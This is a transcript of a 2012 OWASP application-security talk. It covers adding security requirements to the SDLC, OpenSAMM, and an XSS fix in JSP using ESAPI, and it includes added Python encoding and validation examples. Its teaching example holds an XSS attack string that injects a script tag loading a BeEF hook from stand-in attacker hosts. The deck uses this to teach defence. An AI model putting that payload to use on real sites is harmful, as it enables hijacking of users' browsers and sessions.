Application Security Done Right
Most of the money thrown at securing information systems misses the weak spots. Huge amounts are spent securing infrastructure while web applications are left exposed. It is a crisis that is largely ignored.

Software development teams, under pressure to deliver features and meet deadlines, often respond to concerns about the security of their web applications by commissioning a last-minute security assessment and then desperately attempt to address only the most glaring findings. They may even simply throw up a web application firewall to mitigate the threats. Such bolted-on solutions are not long-term answers to web application security.

Instead, we advocate a built-in approach. We will show that by weaving security into the software development life cycle, and using mature resources for security coding standards, toolkits and frameworks such as those from OWASP, development teams can consistently produce secure systems without dramatically increasing the development effort or cost.

This slide deck was most recently presented at a SPIN meeting in Cape Town In September 2012 by Paul and Theo from ThinkSmart (www.thinksmart.co.za).

For more information, contact Paul at ThinkSmart (dot see oh dot zed ay).

  • Who are we, where do we come from and why do we think we’re qualified to speak about building secure apps?

    We have built web apps for most of our professional lives and still actively maintain an in-house web payment system.

    We perform application security assessments using an “inside-out” approach (a design-time assessment as opposed to an adversarial penetration test).

    We help development teams design secure business processes and application architectures.

    We try to advocate application security wherever we can.
  • The Open Web Application Security Project (OWASP) is a worldwide free and open community focused on improving the security of application software. There are over 70 OWASP Local Chapters world-wide that are free and open to anyone to attend. OWASP tools and documents can be used to detect and to guard against security-related design and implementation flaws, as well as to add security-related activities into YOUR Software Development Life Cycle (SDLC).
    For more information please visit http://www.owasp.org
  • To set the scene we’d like to start by looking at where information security risks lie today.

    Risk in the network and infrastructure is largely under control. As our ability to secure our network infrastructure has developed, attackers have turned their attention to web applications because they have become the softer target. At the same time, companies are increasingly moving their business processes to the Web to take advantage of the efficiencies and market reach it provides. This has dramatically increased the opportunity for attack by people seeking to undermine business through fraud, theft, extortion or espionage. A perfect storm of sorts.

    Attack tools have become industrialised, giving a person with intent easy access to the means to commit the crime (which was not the case in the recent past).

    Tell the Dalai Lama hack story: “today attackers can buy a root kit and go hunting” (Ross Anderson).

    Various recent studies support this notion...
  • Anecdotally, we can support this: we’re a small consultancy and recently we have had three clients who have suffered directly from app sec attacks. In one case it was a small business that lost a CMS (and the data!) in a drive-by SQLi attack.

    Clearly, thinking you’ll never get attacked is not a good strategy.
  • To underpin this, here is an extract from the highly respected Verizon DBIR executive summary.

    Note that the report does not say that mitigation efforts need to focus on installing a firewall.

    The focus of attention should now be web apps and evolving ways of building them more securely.
  • We’ve seen that the focus of attacks on web applications is clearly one driver for application security, but what are the others?

    To use Phil Zimmermann’s very eloquent idiom (last year’s ITWeb Summit):

    Web apps are a fundamental part of our modern-day society.

    We need to mature app sec; e.g. even Internet banking is in ICU at the moment, and in some ways the attackers have the upper hand.

    Be responsible citizens: our clients (users) are demanding it (e.g. phishing victims).

    PCI DSS 6.5: “Develop all web applications (internal and external, and including web administrative access to application) based on secure coding guidelines such as the Open Web Application Security Project Guide.”
  • “Data security doesn’t stop with network firewalls and anti-virus. The threat landscape has shifted from bringing down networks to stealing data, and it’s time to stop fighting yesterday’s war.” (S Kramer, CEO, Imperva), April 2010 survey, “The State of Application Security”.

    But even though apps are the focus of attacks, NetSec is still the darling. It gets the bulk of the spend.

    Compliance requirements tend to lag the trend, e.g. PCI DSS still prioritises net sec over app sec.

    Budget inertia: Gunnar Peterson says the same.

    Relate Gary McGraw’s description of app sec being treated as a network problem (in the OSI stack the app is just a layer 7 problem, hence app firewalls!).

    GMcG: perhaps the app sec industry could learn from the net sec industry; they must have had the same challenge wresting budget away from the physical sec guys!
  • With apologies to Apple, we need to Think Different.

    Don’t ignore application security just because it seems to be difficult.

    App sec needs a different approach from NetSec: lego vs clay.

    The “hole” allows access to the entire application, its features and its flaws.

    It’s hard enough designing good software; security makes it harder still.

    Application security cannot be seen as a net sec problem. WAFs can complement a built-in approach, but not replace it. WAFs are complex chunks of code that have their own vulns.

    Ask how many devs are in the audience...
  • So we need to build security in. Devs obviously should be writing more secure code. But why should they?

    Managers often take a naive, simplistic view of security, as if it is naturally part of every developer’s skill set, like the ability to implement a sorting function. Universities today still don’t teach security to CompSci students.

    For most developers today, caring too much about security is probably a career-limiting move. They need to focus on that latest AJAX / iPhone app / Rails skill to get the big-bucks job.

    Software development teams, under pressure to deliver features and meet deadlines, often respond to concerns about the security of their web applications by commissioning a last-minute security assessment and then desperately attempting to address only the most glaring findings. They may even simply throw up a web application firewall to mitigate the threats. Such bolted-on solutions are not long-term answers to web application security.

    So how do you get your developers to write more secure code?
  • ... you could appeal to their conscience ...

    Encourage them to subscribe to the Rugged Manifesto, LOL!
  • ... or send them on a training course ...

    That’s a better idea, but...

    then they get back to the office and the net effect is that they now have (n - training.course.days) to finish the features.
  • Trying to make security a religion or turning selected devs into security ninjas is only a partial and temporary response to the problem.

    Ross Anderson, in his great book “Security Engineering”, makes the point that security is about incentives.

    The only sustainable way is to put security in the spec, i.e. make it part of the requirements of your project and one of the fundamental ways in which the performance of your development teams is measured. Everything flows from there, as we will show.

    Software development teams, under pressure to deliver features and meet deadlines, often respond to concerns about the security of their web applications by commissioning a last-minute security assessment and then desperately attempting to address only the most glaring findings.

    The only way to build security in is to make it part of the requirements.

    Obviously this has implications, not least of which is on the cost of your project.

    We’ll talk about these as we go along.
  • So why this emphasis on spec’ing for security? Why not just code it, or test for it?

    1. It’s the most efficient place to do it.
    2. The SDLC you use today will be able to cope with it (i.e. no need to change your SDLC to cope).
  • Two types of security requirements:
    1. avoid security bugs
    2. avoid security design flaws (the software works as intended, but the intention was wrong, or unintended features exist that do not break functionality but enable exploits).

    (Gary McGraw) perhaps up to 50% of security vulnerabilities are design flaws, not bugs.
  • Don’t fixate on the latest headline-grabbing vulnerabilities.

    A famous scene from the Marx Brothers movie Horse Feathers features Baravelli guarding the speakeasy and Wagstaff trying to get in. The password for entry is "Swordfish". This bit was the inspiration for the title of the hacker movie Swordfish.

    Imagine the guy on the left is the manager / business analyst and the guy on the right is the developer. Basically the whole “watch the door” process gets left up to “the developer” to design.

    You need a lateral thinker to get security design right, someone who can think like an adversary. Not common.
  • Bad or missing requirements get left up to the developers to invent, and they’re not always in tune with the big picture...
    Apart from the complete failure of the control because the password retry protocol was left up to the dev to design (with "here is the password" as the prompt for the third retry!), there are some good aspects:
    - There seemed to be a blacklist for easy-to-guess passwords (not "password"!)
    - Swordfish is not a great password but it is at least not in the top 500 bad passwords.
    - They change the password often.
  • Three drivers of security requirements.

    The ISO should understand the business better than anyone if he is to have any hope of making a contribution to this process.

    NB! Let’s read this again!
  • Security requirements are just one aspect of a secure SDLC. All phases of an SDLC must be “touched” by security to make a sustainable difference to the security of the code produced by your team.

    This is where a Software Assurance Programme can help: using resources such as OpenSAMM, BSIMM and Microsoft SDL, orgs have access to great prescriptive guidance on how to go about bootstrapping their SDLCs for app sec.
  • So how do you integrate these activities in your SDLC?

    One step at a time! Your software assurance programme should lead the way.
  • Your software assurance programme should do these things.
  • Get app sec into the DNA of your company, just like you have already institutionalised NetSec & InfraSec (e.g. anti-virus, firewalls, VPN, laptop encryption etc.).

    Starting at the top, the ISO 27001/2 standards have controls that directly address app sec.

    A Software Assurance Programme directly addresses these control requirements in your ISMS.

    The SAP weaves a golden thread of security through your SDLC.

    Again, your devs are NB!
  • In the medium to long term, you need to institutionalise app sec.

    You can start today by opening up your user story template and adding just one line: a link to the OWASP Top 10, i.e. “the security requirement is that we are not vulnerable to this list of security bugs”.
  • How do you write software?
    By using a process called the SDLC.
    Some only do coding and deployment.
    Others include design and testing.
    But without requirements you can’t really do any of the other phases.
    What do you design, code and test against?
    Or for that matter deploy and maintain?
    Proper, clear requirements are the key to the success of any software project.
    So, how do you write secure software?
  • You have to apply security to each one of the SDLC phases.
    Whatever software development methodology you use...
    ...they all have the same phases
    ...maybe not in the same order, or using iterations.
    The important thing to realise is that...
    ...without security requirements...
    ...you don’t know what security to design into the software
    ...you don’t know how or where to apply secure coding
    ...or even what security features to test for.
  • If security requirements are all we need...
    ...what are we waiting for?
    If your management is not ready to implement security...
    ...you will have to convince them first.
    If you are lucky, you can start right away and implement OpenSAMM...
    ...and get the ball rolling.
    ...implement your Secure SDLC
    ...and do the security requirements dev tasks...
    ...with risk assessment probably the most important.
    But, you still have production systems deployed...
    ...and even more being produced as we speak.
    So, what’s the problem?
    The one thing that you don’t have but the hackers do have is time...
    which turns your situation into a timebomb.
  • Where to now?
    At this point you need to do fire-fighting using some kind of...
    ...first-aid or quick-win solution.
    The good news is that all the information and tools are available.
    The general state of app security is very low.
    With some effort you can make a huge difference.
  • OWASP collates information about several security projects, including the popular Top 10 Application Security Risks.

    To get going with our plan, download the Top 10 document.
  • The Top 10 Application Security Risks list is just what it says.
    There is a big chance that these risks are also your organisation’s top 10 risks.
    The interesting fact to realise is that by adopting these risks...
    ...you have made a big step in establishing your security requirements.
    Start by implementing these requirements!!
  • To read from the document:
    XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping.
    XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
    The Cheat Sheet detail page for XSS, like the detail pages for the other risks...
    ...gives a very concise explanation of the vulnerability...
    ...the attack and the defence...
    ...and lists a whole lot of resources (both internal and external to OWASP)...
    ...that are invaluable in mitigating the risk.
    The Cheat Sheet is the place to start.
  • The Cheat Sheet explains the problem in detail...
    ...and stipulates the rules for the various contexts...
    ...of the HTML page...
    ...where attacks can happen.
    For example, an HTML page contains HTML, JS and CSS values...
    ...each context having its own allowed characters and string delimiters.

    Let’s look at attacks on existing JavaScript in your page.
  • The rule for JS is to encode (or escape) before inserting untrusted data into HTML JS data values.
    Basically there are 3 places...
    ...inside a quoted string
    ...one side of a quoted expression
    ...inside a quoted event handler.
    You may wonder where this untrusted data comes from.
    The HTML page is generated by a web application server...
    ...using data originating from all kinds of sources, e.g. the database, the browser, other apps...
    ...that you do not have any control over.
    Let’s look at some code.
  • This is Java Server Pages source code.
    It could have been any other tech, like PHP, ASP, whatever.
    The developer’s intent was to...
    ...get the name of a user from the browser
    ...and then to say Hello to him or her.
    The untrusted data is shown as a comment...
    ...and in this example originates from the user or the browser.
    It contains an attack string...
    ...that starts with the single quote delimiter character
    ...to break out of the JS data value context.
    No encoding takes place.
    And the generated page contains an XSS injection that
  • To stop such attacks you need to write secure code.
    Secure code utilises security controls.
    The Cheat Sheet gives exact information on...
    ...where
    ...what
    ...and how such a control should work.
  • The important thing about choosing a security control is...
    ...that it has to work correctly
    ...and that you want to use only a single control for a specific mitigation.
    Think before rolling your own...
    ...you may waste lots of time.
    Your framework could help you.
    Microsoft has plenty of tools.
    OWASP’s ESAPI is what I use.

    ESAPI is an integrated set of security controls.
  • I use OWASP’s ESAPI project.
    It’s basically free and can be distributed with my app.
    It works.
    It is designed to be used with existing frameworks like...
    ...Spring, Struts, Tapestry.
    Experts keep it up to date.

    So, how do you use it?
  • One line of code and you have...
    ...proper encoding
    ...and safe rendering.

    See how the single quote is encoded as \x27...
    ...which does not break the string data value context.

    But that data is quite ugly, you may remark.
    Shouldn’t you do some input validation?
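The encoding step described in these notes (the single quote becoming \x27 so it can no longer close the JavaScript string literal), as an added, self-contained example that is not the presentation's JSP code and does not use ESAPI: it re-implements the Cheat Sheet's \xHH rule for the JS string context in Python, renders a constructed stand-in for the "Hello <name>" page both without and with encoding, and checks whether the untrusted value can leave the string literal.

```python
"""Constructed example: JavaScript-string-context output encoding
(the OWASP XSS Prevention Cheat Sheet rule the notes refer to),
re-implemented standalone. Not ESAPI; ESAPI's encodeForJavaScript
applies the same rule."""
import re


def encode_for_javascript(data: str) -> str:
    """Encode untrusted data for insertion inside a quoted JS string.
    Rule: ASCII alphanumerics pass through; every other code point
    below 256 becomes \\xHH and everything else becomes \\uHHHH.
    Quotes, backslashes, newlines, '<' and '/' are all caught by this,
    so neither the JS tokenizer nor the HTML parser (e.g. </script>)
    can be confused by the data."""
    out = []
    for ch in data:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp < 0x100:
            out.append(f"\\x{cp:02x}")
        else:
            out.append(f"\\u{cp:04x}")
    return "".join(out)


# Constructed stand-in for the JSP page in the talk: a name taken from
# the request lands inside a single-quoted JavaScript string literal.
PAGE_TEMPLATE = (
    "<html><body><script>\n"
    "  var name = '{name}';\n"
    "  alert('Hello ' + name);\n"
    "</script></body></html>"
)


def render_unsafe(name: str) -> str:
    """The vulnerable pattern: raw request data concatenated into JS."""
    return PAGE_TEMPLATE.format(name=name)


def render_safe(name: str) -> str:
    """The fixed pattern: one encoding call at the point of output."""
    return PAGE_TEMPLATE.format(name=encode_for_javascript(name))


def name_literal(page: str) -> tuple[str, str]:
    """Mimic the JS tokenizer for the literal after "var name = '":
    return (raw literal body, the JS that follows the closing quote).
    A backslash always consumes the next character, so an escaped
    quote cannot terminate the literal."""
    marker = "var name = '"
    start = page.index(marker) + len(marker)
    i = start
    while i < len(page):
        if page[i] == "\\":
            i += 2
            continue
        if page[i] == "'":
            return page[start:i], page[i + 1:]
        i += 1
    raise ValueError("unterminated string literal")


_ESC = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")


def decode_js_escapes(literal: str) -> str:
    """The value the JS engine assigns to the variable."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), literal)


def escapes_context(page: str) -> bool:
    """True if the untrusted data broke out of the string literal, i.e.
    the JS after the closing quote is no longer the template's own code."""
    _, rest = name_literal(page)
    return not rest.startswith(";\n  alert('Hello ' + name);")


if __name__ == "__main__":
    # Constructed inputs: a normal name, a name containing the delimiter,
    # and a string of the kind the notes describe (leading single quote).
    for name in ["Theo", "O'Brien", "'; doSomething(); //"]:
        print(f"{name!r}: unsafe breaks out={escapes_context(render_unsafe(name))}"
              f", safe breaks out={escapes_context(render_safe(name))}"
              f", value seen by JS={decode_js_escapes(name_literal(render_safe(name))[0])!r}")
```

Note that the encoded output is ugly (`O\x27Brien`) but round-trips to the original value in the browser, which is why the notes go on to discuss input validation as a separate concern rather than a replacement for output encoding.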
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • One line of code and you have..\n..proper encoding\n..and safe rendering\n\nSee how the single quote is encoded as a \\x27 \n..that does not break the string data value context\n\nBut that data is quite ugly you may remark.\nShouldn’t you do some input validation?\n
  • Let’s get some space on the screen and look only at the code.. ESAPI comes to the rescue again..
  • See the ESAPI validator controls: the normal workflow, and reporting an input failure. ESAPI does security logging and wakes up Intrusion Detection.
  • We have addressed Risk nr 2 of the TOP 10. Most of the other Risks can also be addressed using ESAPI, except #6 and #9. Those are more related to system configuration. There is more than enough information to address that as well.
  • You’ve come a long way but you’re not done yet. There is still plenty to do and understand. The TOP 10 project contains a lot of resources and related projects, both internal and external to OWASP. Notably the dev guide, which is still very valid. The 2010 version is currently being rewritten. Many other resources at OWASP - please go have a look at the website.

Application Security Done Right - Presentation Transcript

  • OWASP Built in, not bolted on: web application security done right Paul van Woudenberg & Theo van Niekerk ThinkSmart
  • ThinkSmart• Paul van Woudenberg & Theo van Niekerk• Web application development background• Strong security focus – clients have demanded it (financial institutions, etc) – we have a passion for security• Today we’re exclusively focussed on helping our clients with application security assurance• We promote OWASP where we can www.thinksmart.co.za
  • OWASP• The Open Web Application Security Project• Worldwide free and open community• Focused on improving the security of application software• Over 70 OWASP Local Chapters world-wide• Tools and documents: – detect and guard against security-related design and implementation flaws – add security-related activities to your SDLC• www.owasp.org
  • Information Security Risk Today• The network / infrastructure security problem is largely solved – mature – standardised – well understood• Business is moving ever more to the Web – efficiencies, market reach – Web 2.0 – SaaS – mobile• Attackers have moved on to exploiting software vulnerabilities in web applications. – they follow the money – attack tools have become industrialised
  • Evidence of Attacks• Reports vary, but most recent ones agree that more than 80% of attacks perpetrated today are against web applications.• 7Safe (UK Security Breach Investigations Report) – “in 86% of all attacks, a weakness in a web interface was exploited”• Privacy Rights Clearinghouse – “In 2009, 93% of all data breaches ... concerned compromised databases or applications.”
  • Verizon DBIR 2010• Latest Verizon Data Breach Investigations Report (for 2010): – Who is behind data breaches? - 92% stemmed from external agents – How do breaches occur? - 50% utilised some form of hacking – What commonalities exist? - 96% of attacks were not highly difficult• Where should mitigation efforts be focused? – Eliminate unnecessary data; keep tabs on what’s left – Ensure essential controls are met – Check the above again – Assess remote access services – Test and review web applications – Audit user accounts and monitor privileged activity – Monitor and mine event logs – Examine ATMs and other payment card input devices for tampering
  • How prevalent are attacks?• July 2012 study: more than 50% of responding companies experienced at least one app sec breach in previous 18 month period• For many, loss > $500k per incident• Key findings: – Application security incidents are common and have severe consequences. – Many organisations still struggle with the most basic security flaws. – Most organisations do not have a holistic or strategic approach to application security. – Application development and security teams and goals are often not aligned for optimised results.
  • Some scary graphs...
  • Other App Sec Drivers• Good civic hygiene (a la Phil Zimmermann, PGP & Zfone) – PZ on why we need to encrypt VOIP: “Phone calls are moving from the well-manicured neighbourhood of the PSTN to the urban blight of the Internet. We must encrypt VOIP - it’s part of good civic hygiene.” – Similarly, business processes are moving from the well-manicured neighbourhood of the front office to web apps located in the urban blight of the Internet. Properly securing web apps is part of good civic hygiene.• Compliance (e.g. PCI DSS)• New Companies Act• PPI Bill• Basel II• King III
  • NetSec is Still the Darling• InfoSec spending is missing the target (yesterday’s war).• White Hat / Imperva survey (April 2010) – “only 18% of IT security budgets were allocated to address the threat posed by insecure Web applications”• But, as we’ve seen, the majority of attacks today are against software applications.• Why are organisations still spending majority of InfoSec budget on network / infrastructure? – Force of habit / budget inertia – “Best practise” – Compliance – OSI stack-approach to security (hence WAFs) – Software security is perceived to be hard (figure: OSI stack - Application, Presentation, Session, Transport, Network, Data Link, Physical)
  • Think Different• Software security can no longer be ignored• But it is a different problem to net / inf sec. – Lego vs Clay• Firewalls still need to allow access to :80 or :443.• Software is like clay - has many degrees of freedom – great for creating all sorts of desired features – but often the process of building software systems results in all sorts of undesired features, including security vulnerabilities
  • Expectation vs Reality• So clearly, developers need to write more secure code• But why would they do this if they are measured only on how fast they deliver business features?• Developers don’t attend security conferences - they’re back at the office churning out features• Your software developers are your most important security resource! (cartoon caption: “BY THE WAY, YOUR CODE IS SECURE, ISN’T IT?”)
  • Rugged Software Manifesto• ruggedsoftware.org
  • Security Training
  • Security in the spec• Security is about incentives (Ross Anderson)• Developers need to be measured on the security of their code• To do this fairly, it cannot be done in an ad-hoc fashion - developers need to fulfil security requirements just like they do feature requirements• Security requirements must be part of the spec of each system• Build security in – start by creating explicit security requirements in your specifications
  • The Quality Lever Source: Borland• Applies equally to security
  • Security Requirements• Take measures to avoid security bugs – OWASP Top-10 & Dev Guide – Frameworks – Tools• Take measures to reduce security design flaws – In the requirements process: • business analysis produces feature requirements • do risk analysis on business requirements to drive out security requirements - if the BA is not a security expert, get your ISO or an expert consultant to help.
  • Security in the Design• Security feature design is important and hard to get right.
  • What’s the password?
  • Drivers for Security Requirements• Business needs – functional needs of the business processes implemented in the app (e.g. data access permissions, forgot password process)• Risk analysis – threat modelling, vulnerability analysis, abuse cases – attack trees, STRIDE, DREAD – involve the business owners to discover severity of each type of loss – involve your ISO• Regulatory demands – PPI – SAS 70 – ECT Act – FIPS (crypto)
  • Secure SDLC• Weave a thread of security through each phase of your SDLC: – Requirements – Design – Construction – Testing – Deployment – Operations – Decommissioning• Security touches all aspects of an SDLC and must be reasonably spread over the process.
  • Security Activities in SDLC• Typical security activities in a Secure SDLC include: – Source Code Protection – Fuzzing – Threat Modelling – Security Requirements Template – Static Analysis – Dynamic Analysis – Security Enriched Code Libraries – Automated Penetration Testing – Training – Security Code Review – Manual Penetration Test – Final Security Review/Audit
  • Software Assurance Program• OpenSAMM (Software Assurance Maturity Model)• An OWASP Project• Drivers for a maturity model: – An organisation’s behaviour changes slowly over time • Changes must be iterative while working toward long-term goals – There is no single recipe that works for all organisations • A solution must enable risk-based choices tailored to the organisation – Guidance related to security activities must be prescriptive • A solution must provide enough details for non-security-people – Overall, must be simple, well-defined, and measurable
  • SAMM Business Functions• Start with the core activities tied to any organisation performing software development.• Named generically, but should resonate with any developer or manager. (figure: the SAMM Business Functions diagram; its labels did not survive extraction)
  • SAMM Security Practices• From each of the Business Functions, 3 Security Practices are defined.• The Security Practices cover all areas relevant to software security assurance.• Each one is a ‘silo’ for improvement.
  • Under each Security Practice• Three successive Objectives under each Practice define how it can be improved over time. – This establishes a notion of a Level at which an organisation fulfils a given Practice.• The three Levels for a Practice generally correspond to: – (0: Implicit starting point with the Practice unfulfilled) – 1: Initial understanding and ad hoc provision of the Practice – 2: Increase efficiency and/or effectiveness of the Practice – 3: Comprehensive mastery of the Practice at scale
  • SAMM Roadmap• To make the “building blocks” usable, SAMM defines Roadmaps templates for typical kinds of organisations: – Independent Software Vendors – Online Service Providers – Financial Services Organisations – Government Organisations
  • SAMM Re-cap• Evaluate an organisation’s existing software security practices.• Build a balanced software security assurance program in well-defined iterations.• Demonstrate concrete improvements to a security assurance program.• Define and measure security-related activities throughout an organisation.
  • Institutionalise App Sec• Your ISMS demands it - e.g. ISO 27001/2: – 10.9: Electronic commerce services – 11.6: Application and information access control – 12: Information systems acquisition, development and maintenance• Create a software assurance programme to address these – OpenSAMM, BSI-MM, Microsoft SDL• Weave a thread of security through your SDLC.• At very least, put security requirements in your specs & give your development teams the three T’s :) – Training (consultants can help) – Tools (lots of excellent free tools available) – Time (to get to grips with their role in security - most devs not exposed - flaw in dev education at uni, tech etc.)
  • App Sec in Context (built up layer by layer, outermost first) – ISMS: ISO 27001 – Software Assurance Programme: OpenSAMM – Secure SDLC: Agile (Scrum) – Secure Coding: Dev Guide
  • How do I start?• Medium to long-term – establish a formal software assurance programme (e.g. OpenSAMM).• Today – put security requirements in your specs – start with generic risk-based requirements, e.g. OWASP Top-10 – find/appoint a champion (with authority) who will oversee this
  • Software Development• Software Development Life-Cycle – Requirements – Design – Coding – Testing – Deployment – Maintenance – Disposal (stamp: “Key to success”)
  • Secure SDLC• Secure Software Development Life-Cycle – Secure Requirements – Secure Design – Secure Coding – Secure Testing – Secure Deployment – Secure Maintenance – Secure Disposal (stamp: “Key to Security”)
  • Security Requirements• Change your organisation – Executive buy-in – Implement S-SDLC• Steps to develop Requirements – Engage with Client / Business Partner – Identify Policies and Standards – Identify Regulatory, Compliance, and Privacy Requirements – Develop CIA Objectives – Develop Procurement Requirements – Perform Risk Assessment (overlay: “What’s the problem?”)
  • What now?• There is hope :)• All that you need is available – Information – Tools – Techniques – Training – Plan• You can make a big difference
  • OWASP Top 10 (OWASP Open Web Application Security Project)• OWASP has tools and resources to help• Get the Top 10 – http://www.owasp.org/index.php/Top_10 (overlay: “Next Step”)
  • Top 10 - Fix these (overlay: “Start by doing these!”)
  • Top 10 - XSS (overlays: “Read this”, “Get the Cheat Sheet”)
  • XSS Cheat Sheet• Implement the XSS Prevention Rules – Never Insert Untrusted Data Except in Allowed Locations – Encode before Inserting Untrusted Data into • HTML Element Content • HTML Common Attributes • JavaScript Data Values • Style Property Values • URL Parameter Values – Validate/Clean User-driven HTML – Prevent DOM-based XSS
  • Escaping JS Data• JavaScript Encode Before Inserting Untrusted Data into HTML JavaScript Data Values – inside quoted string <script>alert('ENCODE UNTRUSTED DATA')</script> – one side of quoted expression <script>x='ENCODE UNTRUSTED DATA'</script> – inside quoted event handler <div onmouseover="x='ENCODE UNTRUSTED DATA'"></div>
  • Unsafe Code• JSP Source (untrusted data; no encoding!)
    <%
      /** name gets set to:
      Jim');"><script src=http://evil.com/beef/hook/beefmagic.js.php></script><"'
      **/
      String name = request.getParameter("name");
    %>
    <body onload="alert('Hello <%=name%>');">
  • Generated HTML (XSS injection)
    <body onload="alert('Hello Jim');"><script src=http://attackersite/beef/hook/beefmagic.js.php></script><"'');">
  • Security Control• What should the Control do? – Encode unsafe data – Prevent switching out of the data value context • into the script context • into another attribute.• How? – Allow Alphanumeric characters – Encode chars < 256 using the \xHH format – Encode chars >= 256 using the \uHHHH format – Don’t use shortcuts like \" \t \n – HTML parser runs before JS parser, e.g. </script> inside quotes
  • Selecting a Control• Think carefully before rolling your own – May introduce new vulnerabilities – May not work correctly – Don’t reinvent the wheel• Your Framework is your friend – Tapestry/Spring/Cake/Symfony – But verify the implementation first!• Microsoft SDL – http://antixss.codeplex.com• OWASP Enterprise Security API – ESAPI – Java and PHP
  • OWASP’s ESAPI• Enterprise Security API – by OWASP• Set of foundational security controls• Integrated with each other• BSD license• Major security firm did line-by-line code review• Get there faster and cheaper• Includes Intrusion Detection Framework – Wire this to the inner workings of your app – Security Logs – WAF with custom rules
  • Safe Code (with ESAPI)• JSP Source (untrusted data; proper encoding)
    <%
      /** name gets set to:
      Jim');"><script src=http://attackersite/beef/hook/beefmagic.js.php></script><"'
      **/
      String name = request.getParameter("name");
      String safe = ESAPI.encoder().encodeForJavaScript(name);
    %>
    <body onload="alert('Hello <%=safe%>');">
  • Produced HTML (safe rendering)
    <body onload="alert('Hello Jim\x27\x29\x3B\x22\x3E\x3Cscript\x20src\x3Dhttp\x3A\x2F\x2Fattackersite\x2Fbeef\x2Fhook\x2Fbeefmagic.js.php\x3E\x3C\x2Fscript\x3E\x3C\x22\x27');">
  • More ESAPI (where’s the input validation?)
    String name = request.getParameter("name");
    String safe = ESAPI.encoder().encodeForJavaScript(name);
  • Input Validation (validate input; ESAPI does security logging and wakes up Intrusion Detection)
    Validator validator = ESAPI.validator();
    try {
      String name = validator.getValidInput(context, request.getParameter("name"), CLIENT_RE, 16, false);
      String safe = ESAPI.encoder().encodeForJavaScript(name);
      // normal workflow
    } catch (ValidationException x) {
      // report input failure to user
    }
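As an added example (not ESAPI’s code and not the presenters’ own), a Python sketch of the two controls used on this slide and the Security Control slide above: a JavaScript-context encoder that follows the stated rules (alphanumerics pass; other characters below 256 become \xHH, the rest \uHHHH, no shortcut escapes; like ESAPI it also leaves `,` `.` `_` untouched, which is why beefmagic.js.php keeps its dots in the produced HTML) and a whitelist validator in the shape of getValidInput. The CLIENT_RE pattern and the sample inputs are constructed assumptions.

```python
import re
from typing import Optional

# Besides alphanumerics, ESAPI's JavaScript codec leaves these characters as-is.
IMMUNE_JAVASCRIPT = frozenset(",._")

# Constructed stand-in for the slide's CLIENT_RE whitelist (assumption, not ESAPI's):
# a name of 1..16 letters, spaces, hyphens or apostrophes, starting with a letter.
CLIENT_RE = r"[A-Za-z][A-Za-z' -]{0,15}"

# The payload from the slide, used here only as a constructed test input.
ATTACK_NAME = "Jim');\"><script src=http://attackersite/beef/hook/beefmagic.js.php></script><\"'"


class ValidationException(Exception):
    """Raised when input fails the whitelist; mirrors ESAPI's ValidationException."""


def encode_for_javascript(data: Optional[str]) -> Optional[str]:
    """Encode untrusted data for use inside a quoted JavaScript string literal.

    Follows the control rules from the slide: alphanumerics pass through,
    any other character below 256 becomes \\xHH, everything else \\uHHHH.
    No shortcut escapes (\\", \\t, \\n) are emitted, so the output never
    contains a quote, '<', '>', '&' or '/' and cannot close the string,
    the attribute or the script element it is placed in.
    """
    if data is None:
        return None
    out = []
    for ch in data:
        cp = ord(ch)
        if (ch.isascii() and ch.isalnum()) or ch in IMMUNE_JAVASCRIPT:
            out.append(ch)
        elif cp < 0x100:
            out.append("\\x%02X" % cp)
        elif cp < 0x10000:
            out.append("\\u%04X" % cp)
        else:
            # JavaScript \u escapes are UTF-16 code units, so astral code
            # points (emoji, rare CJK) must be emitted as a surrogate pair.
            cp -= 0x10000
            out.append("\\u%04X\\u%04X" % (0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF)))
    return "".join(out)


def get_valid_input(context: str, value: Optional[str], pattern: str,
                    max_length: int, allow_null: bool) -> Optional[str]:
    """Whitelist-validate value, in the shape of ESAPI's Validator.getValidInput.

    Returns the value unchanged when it is acceptable; otherwise raises
    ValidationException. The context names the field for the error and log.
    """
    if value is None or value == "":
        if allow_null:
            return None
        raise ValidationException("%s: input is required" % context)
    if len(value) > max_length:
        raise ValidationException("%s: input longer than %d characters" % (context, max_length))
    if re.fullmatch(pattern, value) is None:
        raise ValidationException("%s: input does not match the whitelist" % context)
    return value


def render_onload(raw_name: Optional[str]) -> str:
    """Validate, then encode, then interpolate: the slide's JSP flow in Python."""
    name = get_valid_input("hello.name", raw_name, CLIENT_RE, 16, False)
    safe = encode_for_javascript(name)
    # The encoder output is limited to [A-Za-z0-9,._\], so it is also safe
    # inside the double-quoted onload attribute without further encoding.
    return '<body onload="alert(\'Hello %s\');">' % safe


def accepts(raw_name: Optional[str]) -> bool:
    """True when render_onload accepts raw_name, False when validation rejects it."""
    try:
        render_onload(raw_name)
        return True
    except ValidationException:
        return False


if __name__ == "__main__":
    print(render_onload("Jim"))
    print(encode_for_javascript(ATTACK_NAME))  # encoding alone neutralises the payload
    print(accepts(ATTACK_NAME))                # validation rejects it outright
```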
  • Top 10 - Done (overlay: “Start by doing these!”)• ESAPI APIs mapped onto the Top 10: – ESAPI Encoder, Validator APIs – ESAPI Encoder API – ESAPI Authenticator, User APIs – ESAPI Access Ref Map, Access Ctrl APIs – ESAPI HTTPUtils – ESAPI Encryptor API – ESAPI Access Control API – ESAPI Security Wrapper Response
  • So what about risk #11?• You’re not done yet - the Top-10 is just the beginning• OWASP Top-10 - document references & additional risks references.• OWASP Development Guide – http://www.owasp.org/index.php/Category:OWASP_Guide_Project – 2005 version – Surprisingly still very valid – 2010 version under development• CWE / SANS Top 25 – http://cwe.mitre.org/top25/index.html• WASC – http://projects.webappsec.org/Threat-Classification – http://projects.webappsec.org/Threat-Classification-Taxonomy-Cross-Reference-View
